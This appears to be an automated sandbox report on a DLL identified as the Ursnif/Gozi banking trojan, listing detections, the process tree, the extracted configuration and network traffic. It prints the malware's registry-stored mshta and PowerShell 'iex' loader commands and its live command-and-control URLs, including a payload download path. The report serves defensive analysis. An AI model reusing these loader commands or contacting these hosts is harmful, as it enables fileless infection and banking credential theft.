
Analysis Report u8xtCk7fq8.dll

Overview

General Information

Sample Name: u8xtCk7fq8.dll
Analysis ID: 352339
MD5: 913c77883aa2e28ec98e5cf86d6fc2cb
SHA1: 5a5c60b32770cb4654269a812d07e13767ad7ed6
SHA256: ae55975bd40147ab3b9a02f1e2e0279f714bce9845d26ace252cd590a42d733d
Tags: dll

Detection

Gozi Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Gozi e-Banking trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Hooks registry keys query functions (used to hide registry keys)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6224 cmdline: loaddll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll' MD5: 99D621E00EFC0B8F396F38D5555EB078)
    • rundll32.exe (PID: 6352 cmdline: rundll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 3728 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6548 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3728 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 2268 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6900 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6600 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6688 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17426 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4616 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 5452 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17440 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 3540 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3548 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6684 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4660 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3102.tmp' 'c:\Users\user\AppData\Local\Temp\cuuygyc1\CSCC66BFCF5E1994D52B7125888E8D0949B.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6556 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
  • mshta.exe (PID: 1864 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6200 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6444 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6904 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3577.tmp' 'c:\Users\user\AppData\Local\Temp\lojdfmf3\CSC1A2D97838D3A497FBCCAE884ABC3AAE9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "204", "system": "ec5da33e47422f50fe45e0bf35be0dd0hh", "size": "201288", "crc": "2", "action": "00000000", "id": "3300", "time": "1613152798", "user": "3d11f4f58695dc15e71ab15c2c196ce3", "hash": "0x4e2f3f66", "soft": "3"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.436611302.0000000005828000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.542420710.0000000006FFB000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.437085492.0000000005828000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.480264315.00000000055AD000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(5 of 26 entries shown)

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process started | Author: Joe Security | Data:
  • Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline'
  • CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline'
  • CommandLine|base64offset|contains: zw
  • Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  • NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  • OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  • ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
  • ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  • ParentProcessId: 3548
  • ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline'
  • ProcessId: 6684

Sigma detected: MSHTA Spawning Windows Shell
Source: Process started | Author: Michael Haag | Data:
  • Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
  • CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
  • CommandLine|base64offset|contains: (empty)
  • Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  • NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  • OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  • ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
  • ParentImage: C:\Windows\System32\mshta.exe
  • ParentProcessId: 3540
  • ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
  • ProcessId: 3548

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://golang.feel500.at/api1/cQHZbpVEoMes2jDUrR_2F/bktLNyGZ_2BiAtXa/xg4NyCOv1cwnNr2/CgkDzrwWZPupVFo | Avira URL Cloud: Label: malware
Source: http://golang.feel500.at/api1/6DXTv_2FudTfVxedDD3UMQ/xS_2FoOKoiAeF/j0VSQAcL/gS9HWeAk0_2F3Z4xgoE9VU8/6izVNWCf_2/BuY7MmzZCc40Rhjlu/B4FbRUu_2FOa/7V0Ff9EtB1A/GAZdoYUkX2pBQy/DpMAjJMM0d1LaayU4tu_2/Fsf5ndznFCuQrj3e/8VhAjUXdrSXwe0n/HOOcG0t_2FpMgIGwve/oERmGT4tA/XmAqCpIkdN_2FImpVylW/FHybdHaObNxlM3otB6A/Y5ae5imM74agsv2hL9KKKN/UaXEdvmu64Qap/TG_2FQ9U/mG6Y2EiFIZCIHUi9iJIG41z/L0LjQmKgxf/OtAgg8QY5/yM8_2B0 | Avira URL Cloud: Label: malware
Source: http://golang.feel500.at/api1/6DXTv_2FudTfVxedDD3UMQ/xS_2FoOKoiAeF/j0VSQAcL/gS9HWeAk0_2F3Z4xgoE9VU8/ | Avira URL Cloud: Label: malware
Source: http://c56.lepini.at/jvassets/xI/t64.dat | Avira URL Cloud: Label: phishing
Source: http://golang.feel500.at/favicon.ico | Avira URL Cloud: Label: malware
Source: http://golang.feel500.at/api1/cQHZbpVEoMes2jDUrR_2F/bktLNyGZ_2BiAtXa/xg4NyCOv1cwnNr2/CgkDzrwWZPupVFoQNH/s8j31toeM/WHQs0DfRjGaPCW6Sk_2F/P21C2qJ3xd8l4QW1_2F/_2BCijsFomil85BW5tjyOE/vC4SLWVsudj9d/6p03Rh40/Oja1RIlTt_2F7DIg_2BdfV_/2F8i4PYPiF/iz_2FhrCPH_2B_2BQ/XXMADzrcnZWI/Hfv_2Bg59ad/cN7apglT0lQ7sQ/gNChqsZOPXttxVF41ze7_/2BkKWJ0wITm6Vd4A/wCJ1rQ02kuFRKOd/FLdCUCore_2F0Msy7C/S_2BUR4fF/nA78eeAv6Ywkiob/VeCW9pRE | Avira URL Cloud: Label: malware
Found malware configuration
Source: loaddll32.exe.6224.0.memstr | Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "204", "system": "ec5da33e47422f50fe45e0bf35be0dd0hh", "size": "201288", "crc": "2", "action": "00000000", "id": "3300", "time": "1613152798", "user": "3d11f4f58695dc15e71ab15c2c196ce3", "hash": "0x4e2f3f66", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: c56.lepini.at | Virustotal: Detection: 8%
Source: api3.lepini.at | Virustotal: Detection: 10%
Source: go.in100k.at | Virustotal: Detection: 7%
Multi AV Scanner detection for submitted file
Source: u8xtCk7fq8.dll | Virustotal: Detection: 33%
Machine Learning detection for sample
Source: u8xtCk7fq8.dll | Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: u8xtCk7fq8.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Binary contains paths to debug symbols
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000023.00000002.586036318.0000023E99060000.00000002.00000001.sdmp, csc.exe, 00000024.00000002.590796199.000002D199FF0000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.596196154.00000000062A0000.00000004.00000001.sdmp, rundll32.exe, 00000001.00000003.615896828.0000000007DF0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.596196154.00000000062A0000.00000004.00000001.sdmp, rundll32.exe, 00000001.00000003.615896828.0000000007DF0000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009C888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,0_2_009C888D
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009BE0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_009BE0BA
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009D4FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,0_2_009D4FE1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CA888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,1_2_00CA888D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C9E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_00C9E0BA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CB4FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,1_2_00CB4FE1
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009C05EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,0_2_009C05EF
Source: global traffic | HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: c56.lepini.at
Source: Joe Sandbox View | ASN Name: GOOGLEUS GOOGLEUS
Source: global traffic | HTTP traffic detected: GET /api1/qYtT2W6uUWYJe_2BzG0bJ6/f78jap2G9vTVk/IGsP0y4o/fylIZ_2BQ_2FE0eKcgRyOZV/bwC_2FjfVv/DbtDrQABR9ML9yi1I/a0_2FluH0sU4/80C1scx2jQi/Sm75TjK2Hru6lN/LiAEhJ6pLxTSd4lLSPDNE/hnQ63sbU9X_2Fzoj/gMi3emWWJ488JmV/OalYx6aLrHAsj_2FD5/gwLYQsfyc/LLUkPczTLA0_2B21Yg9i/Zuc0lw0nukK632v8MOb/hMd02siaNyV1doJYj48PSY/dhZQ85SXuAqzk/d_2FIgou/B6fGbyYsoLl0lNh77c_2Blt/2Rm26 HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/6shKz_2BQVnN/OCP1pP4Tyvc/HZOndob_2FtP7a/idZHTuxKtsPI9_2BbDL_2/BF4JwIYV_2B7TAX4/McJ52rW1_2FgARN/40faJ26v_2FkZz1ElZ/d_2BmWnTR/ElzVYUi1oSGpXwpyCzo4/qnIAV1aIx5Bi1e_2B9P/F_2F3VBYsuFw9rFe9x8MBm/BOzSVExVFj_2F/uL_2BJ_2/BhPryJhLkRIvqsfR1DhX_2B/yer6vsREF4/n6YQE_2F_2FK5FDnd/llvOW2cpbliJ/dWtAimwUgXd/EZllvyGgYHINZb/iZ7az3_2FONnJ152lupGR/GoLcwVw9tDIcG6Ji/6Z9JjQwVkidC5aO/Ark1JBZjGu7c/4Glkh HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: go.in100k.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: go.in100k.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/tImL8jZlII9uy/Sa8Z12vW/JG0sDCYv96mnYtDsn1Jnt3e/XYTd0GATXg/XwcDwpCd2vvNyexYh/5IBZNKPDd82e/Sfq1uBktd3t/JAcKip5_2F1iiz/RPTyTdp7IDHiXyZe31kKi/YwPGUHlbAVrZQiJG/SzxK0AoLMu7pJz8/amcTh_2FxtM1YghDIM/RJhzMBJ32/UeEsYhC9E1juxsvgDHu2/XGHdHL4mrBZhgHYHQrE/_2FfBJOhnZDsrt5kghDKCq/x6jFt9w2z9sQ_/2BbtS3lh/ua5XHXz43d5GTeWt38fFqSh/tbGXpr_2B/jQf9TsE9 HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: golang.feel500.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: golang.feel500.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/WpBs3eblZL2bM/eqngm5Qw/I8JSfPJ_2Fa8Gc3pObm8uim/9flcMVIzEU/MRqomoxt8Q2O1JJ03/ZSj1o2HmPZtK/O9QP218enUp/m1K_2FgloiW3rF/oEuojNadbJqe6VOrFglrs/Ndi7e_2Br7N9yDeG/5hb81boaOqEuw3E/kxHEh7CU8L_2FQm9GN/dbnlxd_2B/J8a13_2FHiOHS5rUu68O/mOTX7eo0S_2BSz_2F55/SPIJ116DNn5HQ6QSsDbLuG/U7BuZ1ELETSnp/HKm0Yev_/2BYuFboTfZStfkhwMh7_2Fr/vWxqAs_2B4/ppPPRk2wwNFmF70Ei/cPOuG4TRxPLy6vkSp/GbYUyI HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: go.in100k.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/6DXTv_2FudTfVxedDD3UMQ/xS_2FoOKoiAeF/j0VSQAcL/gS9HWeAk0_2F3Z4xgoE9VU8/6izVNWCf_2/BuY7MmzZCc40Rhjlu/B4FbRUu_2FOa/7V0Ff9EtB1A/GAZdoYUkX2pBQy/DpMAjJMM0d1LaayU4tu_2/Fsf5ndznFCuQrj3e/8VhAjUXdrSXwe0n/HOOcG0t_2FpMgIGwve/oERmGT4tA/XmAqCpIkdN_2FImpVylW/FHybdHaObNxlM3otB6A/Y5ae5imM74agsv2hL9KKKN/UaXEdvmu64Qap/TG_2FQ9U/mG6Y2EiFIZCIHUi9iJIG41z/L0LjQmKgxf/OtAgg8QY5/yM8_2B0 HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: golang.feel500.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: go.in100k.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: golang.feel500.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /api1/cQHZbpVEoMes2jDUrR_2F/bktLNyGZ_2BiAtXa/xg4NyCOv1cwnNr2/CgkDzrwWZPupVFoQNH/s8j31toeM/WHQs0DfRjGaPCW6Sk_2F/P21C2qJ3xd8l4QW1_2F/_2BCijsFomil85BW5tjyOE/vC4SLWVsudj9d/6p03Rh40/Oja1RIlTt_2F7DIg_2BdfV_/2F8i4PYPiF/iz_2FhrCPH_2B_2BQ/XXMADzrcnZWI/Hfv_2Bg59ad/cN7apglT0lQ7sQ/gNChqsZOPXttxVF41ze7_/2BkKWJ0wITm6Vd4A/wCJ1rQ02kuFRKOd/FLdCUCore_2F0Msy7C/S_2BUR4fF/nA78eeAv6Ywkiob/VeCW9pRE HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: golang.feel500.at | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: c56.lepini.at
Source: global traffic | HTTP traffic detected: GET /api1/5I7pLP9QNe/N5buyckYCrgoPqvPA/NjC86WmFUumJ/d5ZJk2tc_2B/naCfPReUYVV3Vx/ldXi9UGRyYBJQ_2Fncfms/yLLq_2F_2FAO72XM/I_2BWOGHGpoip8O/L_2FeZA1PRI5XY_2BB/j3rs0r3Qi/LjAFf6GJs2hLttaGlvqk/QXt9zzN9fNRamdHdcye/Eig_2Fsi5CrdV1iAkxdGXk/dY8xK6yf2XhnW/0wyvHV0p/pz8P8_2FIx_2BIgHiQgkzmF/pVcGr3XY_2/F0IzfpDiL0qRGlWkz/h5CX5vmyOkVW/KUlweXnwefm/x2MMNvATag8_2F/nIODL_2BJ417QebINK55v/VFjAtH9us6H/2M HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 | Host: api3.lepini.at
Source: global traffic | HTTP traffic detected: GET /api1/PA66UeKSfQRT_2Fcj/iLfHO8gQWTV6/hOef_2Bpj3m/vKET8aGISBfnMY/C7Rg8qWLOVBJvNGoXa3bh/JqG7kZOU_2B7n24F/sOI2F2WFZ1YAPkN/T_2BsNeHboXzrn7jqx/15bjKyLUT/gDA9ARyVldWTTyiXOC6v/tXtwdM8cZwpPI2KIOCU/YL8nL41xllyGRALppW8L48/k1SWSYBtfCxFZ/fJXP1vjj/fSbg8F1Si24u64v54ydTM3o/jeiSZAFtwp/B6QKlmIvy6M21AUkZ/3j_2BqQ9D79g/1CFMkegOFCy/pEDZCVezoXWN_2/Bc4g_2B7Dm/6 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 | Host: api3.lepini.at
Source: global traffic | HTTP traffic detected: GET /api1/YULajG8YI4XFMV/YmAg5JNx_2FDNG7TuSVBW/rDRyxARgDEEEuHQw/evIJnvp2g7SCy8L/bJrKo5atF48FzBlZet/fbl2Ha7GH/_2BH9MOFklEvfboI7qgC/aeuT1qWtgUC6wBSbBT9/_2BAmM7g9d5p3WEfySPQlF/ssCzZKRVALgEk/sp0I8w6X/DrAFLFSHvA1oX_2BP0tpKNl/ZAxxPEdckm/yZJPnbWMUA7uRge39/ml3K2b_2FU2A/XzCLaq3SmxR/10nkXEQkMm0VbN/VC8xNzQeSqT1Wl479mf3g/IZqBR2_2FJ_2BQ8j/wVSGqvItzNt/3rN HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 | Host: api3.lepini.at
Source: unknown | DNS traffic detected: queries for: api10.laptok.at
